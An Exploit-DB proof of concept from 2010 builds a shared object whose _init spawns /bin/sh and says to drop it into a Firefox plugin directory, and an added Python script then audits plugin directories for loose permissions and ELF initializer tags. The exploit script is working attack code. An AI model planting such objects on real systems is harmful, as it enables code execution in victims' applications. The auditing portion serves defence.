Local Glibc Shared Library (.so) 2.11.1 – Code Execution

  • Author: Rh0
    Date: 2010-04-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12103/
# Exploit Title: Local Glibc shared library (.so) exploit
# Date: 07.04.10
# Author: Rh0 (Rh0@z1p.biz)
# Software Link: NA
# Version: <= 2.11.1, higher not tested
# Tested on: Debian stable (x86-64), Ubuntu 9.10 (x86), Fedora 12 (x86)
# CVE : NA
# Code :

#!/bin/sh

# A lot of applications in Linux use the shared library structure to be
# able to load plugins, e.g. Mozilla, Geany IDE, Compiz, Epiphany web
# browser and more. Shared libraries are initialized (but not loaded)
# often during startup, at a click on something like "->Tools->Plugins"
# in the menu, or at the latest when they are activated. dlopen() is used
# for initializing and is part of glibc.
# See http://linux.die.net/man/3/dlopen.
# It always executes the _init section of the shared library. A
# malformed _init section makes dlopen crash (NULL dereference). But
# this is not even necessary to exploit an application, as a custom
# _init section is always executed when dlopen is called. The exploit
# can be in the form of a custom compiled file. Also the _init section in
# a plugin already shipped with the application can be overwritten with
# working shellcode to exploit it or some \x41 to crash it.

# PoC:

cat >Xlibx.c<<EOF

#include <unistd.h>

/* _init runs as soon as the loader maps this object via dlopen(). */
void _init(void)
{
    execve("/bin/sh", NULL, NULL); // evil _init
}
EOF

# Build a bare shared object; ld is called directly so that our _init
# replaces the one normally supplied by the C runtime startup files.
gcc -fPIC -c Xlibx.c
ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
rm Xlibx.c
rm Xlibx.o

echo "* copy Xlibx.so to appropriate directory:"
echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
echo "* firefox->Edit->Preferences => Exploit "
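The defensive consequence of the above is that a plugin directory is only as trustworthy as the least privileged account that can write to it: whatever DT_INIT / DT_INIT_ARRAY entries a shared object carries run inside the application the moment it is dlopen()ed. The script below is an added example (not part of the original advisory or of any of the products it names) that audits a plugin directory the way an administrator or a plugin host would want to before loading anything from it: it flags objects that are symlinks, not owned by the expected user or root, or group/world writable, and it walks the ELF program headers to report which initializer tags the loader would execute. It assumes ELF64 little-endian objects; `build_sample_so()` and `demo()` are constructed helpers that fabricate a minimal, non-loadable ELF image so the example runs offline.

```python
"""Audit a plugin directory before anything dlopen()s from it.

Added example, not the advisory's code.  Only ELF64 little-endian objects
are parsed (an assumption of this example); anything else reports no tags.
"""
import os
import stat
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
PT_DYNAMIC = 2
DT_NULL, DT_INIT, DT_INIT_ARRAY = 0, 12, 25
INIT_TAGS = {DT_INIT: "DT_INIT", DT_INIT_ARRAY: "DT_INIT_ARRAY"}


def initializer_tags(data: bytes) -> list:
    """Names of the dynamic tags in `data` that dlopen() executes.

    Walks the ELF64 program headers, finds PT_DYNAMIC and scans its
    (d_tag, d_val) pairs until DT_NULL.  Non-ELF or ELF32 input yields [].
    """
    if len(data) < 64 or data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        return []
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    found = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 56 > len(data):
            break
        p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from("<IIQQQQ", data, off)
        if p_type != PT_DYNAMIC:
            continue
        for j in range(p_filesz // 16):
            d_tag, _d_val = struct.unpack_from("<qQ", data, p_offset + j * 16)
            if d_tag == DT_NULL:
                break
            if d_tag in INIT_TAGS:
                found.append(INIT_TAGS[d_tag])
    return found


def permission_findings(path: str, expected_uid: int) -> list:
    """Ownership/permission problems that let someone else supply the _init."""
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")
    elif not stat.S_ISREG(st.st_mode):
        findings.append("not a regular file")
    if st.st_uid not in (0, expected_uid):
        findings.append("owned by uid %d" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/world writable")
    return findings


def audit_plugin_dir(directory: str, expected_uid=None) -> dict:
    """Map each *.so in `directory` to its findings and initializer tags."""
    if expected_uid is None:
        expected_uid = os.getuid()
    report = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".so"):
            continue
        path = os.path.join(directory, name)
        findings = permission_findings(path, expected_uid)
        with open(path, "rb") as fh:
            data = fh.read()
        if data[:4] != ELF_MAGIC:
            findings.append("not an ELF object")
        report[name] = {"findings": findings, "init_tags": initializer_tags(data)}
    return report


def build_sample_so(tags=(DT_INIT, DT_INIT_ARRAY)) -> bytes:
    """Constructed minimal ELF64 image: header + one PT_DYNAMIC segment.

    Not loadable; it only carries the tags initializer_tags() looks for.
    """
    dyn = b"".join(struct.pack("<qQ", t, 0x1000) for t in tags) + struct.pack("<qQ", DT_NULL, 0)
    ehdr = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)       # ELFCLASS64, LSB, EV_CURRENT
    ehdr += struct.pack("<HHIQQQIHHHHHH", 3, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, 64 + 56, 0, 0, len(dyn), len(dyn), 8)
    return ehdr + phdr + dyn


def demo() -> dict:
    """Constructed scenario: a temp plugin dir with one sane and one loose .so."""
    d = tempfile.mkdtemp(prefix="plugins-")
    good, loose = os.path.join(d, "good.so"), os.path.join(d, "Xlibx.so")
    for p in (good, loose):
        with open(p, "wb") as fh:
            fh.write(build_sample_so())
    os.chmod(good, 0o644)
    os.chmod(loose, 0o666)   # any local user could swap in their own _init
    return audit_plugin_dir(d)


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info["init_tags"], info["findings"] or "ok")
```

Run it against a real directory with `audit_plugin_dir(os.path.expanduser("~/.mozilla/plugins"))`; almost every compiler-built object will report DT_INIT_ARRAY, which is exactly the point: the presence of an initializer is normal, so the control has to be who can write the file, not what the file says about itself.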